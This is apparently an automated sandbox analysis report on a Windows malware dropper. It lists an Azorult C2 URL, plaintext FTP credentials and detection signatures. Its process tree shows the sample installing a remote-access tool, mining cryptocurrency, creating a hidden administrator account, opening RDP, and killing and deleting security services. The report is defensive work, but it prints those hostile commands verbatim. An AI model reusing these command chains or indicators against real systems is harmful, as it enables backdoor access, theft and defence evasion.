Resubmissions

19-01-2021 19:24

210119-s26yznnqsn 10

19-11-2020 13:14

201119-s41ec6lt86 10

Analysis

  • max time kernel
    1804s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    19-11-2020 13:14

General

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.81
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • XMRig Miner Payload 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 20 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Registers new Print Monitor 2 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 7 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 31 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 9 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Views/modifies file attributes 1 TTPs 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
    "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
    Drops file in Drivers directory
    Adds Run key to start application
    Checks whether UAC is enabled
    Modifies WinLogon
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:1192
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Runs .reg file with regedit
            PID:2060
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:1428
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:2204
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:3628
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:504
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:696
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:3712
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:3796
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:2372
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:2780
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:2012
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          Suspicious use of WriteProcessMemory
          PID:428
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:2872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:3920
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:1268
    • C:\ProgramData\install\sys.exe
      C:\ProgramData\install\sys.exe
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
        Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\SysWOW64\timeout.exe
          C:\Windows\system32\timeout.exe 3
          Delays execution with timeout.exe
          PID:3452
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      PID:2196
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        PID:1696
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          NTFS ADS
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:1296
          • C:\Programdata\WindowsTask\winlogon.exe
            C:\Programdata\WindowsTask\winlogon.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:1732
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /query /fo list
              PID:3176
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /query /fo list
                PID:200
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
            PID:4616
            • C:\Windows\system32\ipconfig.exe
              ipconfig /flushdns
              Gathers network information
              PID:4660
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c gpupdate /force
            PID:4776
            • C:\Windows\system32\gpupdate.exe
              gpupdate /force
              PID:4848
          • C:\ProgramData\WindowsTask\audiodg.exe
            C:\ProgramData\WindowsTask\audiodg.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:2428
          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
            C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:5208
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
          PID:2164
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
            PID:204
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
          PID:1744
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
            PID:376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
          PID:744
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
            Modifies file permissions
            PID:3924
        • C:\programdata\microsoft\intel\R8.exe
          C:\programdata\microsoft\intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:360
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:208
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:1256
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:1288
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:2016
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:3968
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:4312
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:4332
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4500
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4552
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:5048
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:2640
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:4192
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:4208
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:1408
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:4352
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:4424
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:4524
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:4540
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:4600
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:4680
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:4620
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:4740
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:4672
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:3768
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4836
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:4772
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:4792
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:2340
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:4952
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:4908
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4988
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:5100
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:4112
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:5116
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:4132
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    PID:4224
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:4788
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:4480
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    PID:4704
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:4624
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:5016
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:4196
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:4240
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:812
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:5064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          PID:1760
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            PID:4100
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          PID:4120
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            PID:4164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          PID:4184
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            PID:4228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          PID:4248
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            PID:4292
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          PID:4360
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            PID:4460
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          PID:4372
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            PID:4472
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          PID:4532
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            PID:4596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          PID:4668
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            PID:4724
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          PID:4744
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            PID:4828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          PID:4896
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            PID:4940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete "windows node"
          PID:4960
          • C:\Windows\SysWOW64\sc.exe
            sc delete "windows node"
            PID:5012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
          PID:4108
          • C:\Windows\SysWOW64\sc.exe
            sc stop Adobeflashplayer
            PID:4156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
          PID:3776
          • C:\Windows\SysWOW64\sc.exe
            sc delete AdobeFlashPlayer
            PID:4320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
          PID:1048
          • C:\Windows\SysWOW64\sc.exe
            sc stop MoonTitle
            PID:4340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
          PID:4464
          • C:\Windows\SysWOW64\sc.exe
            sc delete MoonTitle"
            PID:4392
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
          PID:4536
          • C:\Windows\SysWOW64\sc.exe
            sc stop clr_optimization_v4.0.30318_64
            PID:4636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
          PID:4920
          • C:\Windows\SysWOW64\sc.exe
            sc delete clr_optimization_v4.0.30318_64"
            PID:5004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
          PID:4180
          • C:\Windows\SysWOW64\sc.exe
            sc stop MicrosoftMysql
            PID:4264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
          PID:4384
          • C:\Windows\SysWOW64\sc.exe
            sc delete MicrosoftMysql
            PID:4492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          PID:4344
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            PID:4400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:4276
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            PID:4676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:4512
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            PID:4572
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:4736
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            PID:4928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:4588
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            PID:4992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:5092
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:2388
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:3820
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4316
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4152
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4592
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4644
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4428
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4456
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
          PID:724
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
            PID:4784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
          PID:4980
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
            PID:2408
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
          PID:5104
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
            PID:768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
          PID:4300
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
            PID:4604
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
          PID:4696
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
            PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
          PID:5080
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
            PID:4756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
          PID:5036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
            PID:4204
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
          PID:992
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
            PID:4432
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
          PID:196
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
            PID:5044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
          PID:4860
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
            PID:5088
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
          PID:4488
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
            PID:5084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
          PID:4856
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
            PID:4416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
          PID:4760
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
            PID:4976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
          PID:4996
          • C:\Windows\SysWOW64\netsh.exe
